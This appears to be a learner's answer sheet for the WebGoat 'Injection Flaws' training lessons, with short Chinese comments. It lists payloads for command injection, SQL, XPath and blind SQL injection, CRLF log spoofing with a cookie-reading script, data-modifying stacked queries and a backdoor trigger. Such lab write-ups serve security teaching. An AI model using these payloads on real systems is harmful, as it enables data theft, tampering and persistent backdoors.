Injection Flaws - ImNotHere

1. Command Injection
2. Numeric SQL Injection
3. Log Spoofing
4. XPATH Injection
5. LAB: SQL Injection
6. String SQL Injection
7. Modify Data with SQL Injection
8. Add Data with SQL Injection
9. Database Backdoors
10. Blind Numeric SQL Injection
11. Blind String SQL Injection

1. Command Injection

HelpFile=AccessControlMatrix.help" %26 netstat -an %26 ipconfig"

2. Numeric SQL Injection

101 oR 1=1

3. Log Spoofing

Smith%0d%0aLogin Succeeded for username: admin<script>alert(document.cookie)</script>

4. XPATH Injection

String dir = s.getContext().getRealPath("/lessons/XPATHInjection/EmployeesData.xml");
File d = new File(dir);
XPathFactory factory = XPathFactory.newInstance();
XPath xPath = factory.newXPath();
InputSource inputSource = new InputSource(new FileInputStream(d));
String expression = "/employees/employee[loginID/text()='" + username + "' and passwd/text()='" + password + "']";
nodes = (NodeList) xPath.evaluate(expression, inputSource, XPathConstants.NODESET);

This is what the server gets:

expression = "/employees/employee[loginID/text()='Smith' or 1=1 or 'a'='a' and passwd/text()='password']"

And this is how the server interprets it:

expression = "/employees/employee[ ( loginID/text()='Smith' or 1=1 ) OR ( 'a'='a' and passwd/text()='password' ) ]"

Mike' oR 1=1 oR 'a'='a , Smith' oR 'a'='a都不行

5. LAB: SQL Injection

Stage 1: String SQL Injection
抓包修改password值为 ' or 'a'='a
Stage 2: Parameterized Query #1
这是要我修改代码吗？
Stage 3: Numeric SQL Injection
id值改为101 OR 1=1 ORDER BY salary desc
Stage 4: Parameterized Query #2
这题目到底在说啥？

6. String SQL Injection

Smith' or 'a'='a

7. Modify Data with SQL Injection

 jsmith';update salaries set salary=9999 where userid='jsmith

8. Add Data with SQL Injection

jsmith';insert into salaries(userid,salary) values('test123',99);--

9. Database Backdoors

101;update employee set salary=99000 where password='larry'

CREATE TRIGGER myBackDoor BEFORE INSERT ON employee FOR EACH ROW BEGIN UPDATE employee SET email='john@hackme.com'WHERE userid = NEW.userid

当执行插入操作时就触发更新数据的语句

10. Blind Numeric SQL Injection

101 AND ((SELECT pin FROM pins WHERE cc_number='1111222233334444') = 2364 );

11. Blind String SQL Injection

101 AND ((SELECT length(name) FROM pins WHERE cc_number='4321432143214321') = 4 );

name值长度为4

$ man ascii
#查看asc码表

        101 AND (substring((SELECT name FROM pins WHERE cc_number='4321432143214321'), 1, 1) = 'J' );
        101 AND (substring((SELECT name FROM pins WHERE cc_number='4321432143214321'), 2, 1) = 'i' );
        101 AND (substring((SELECT name FROM pins WHERE cc_number='4321432143214321'), 3, 1) = 'l' );
        101 AND (substring((SELECT name FROM pins WHERE cc_number='4321432143214321'), 4, 1) = 'l' );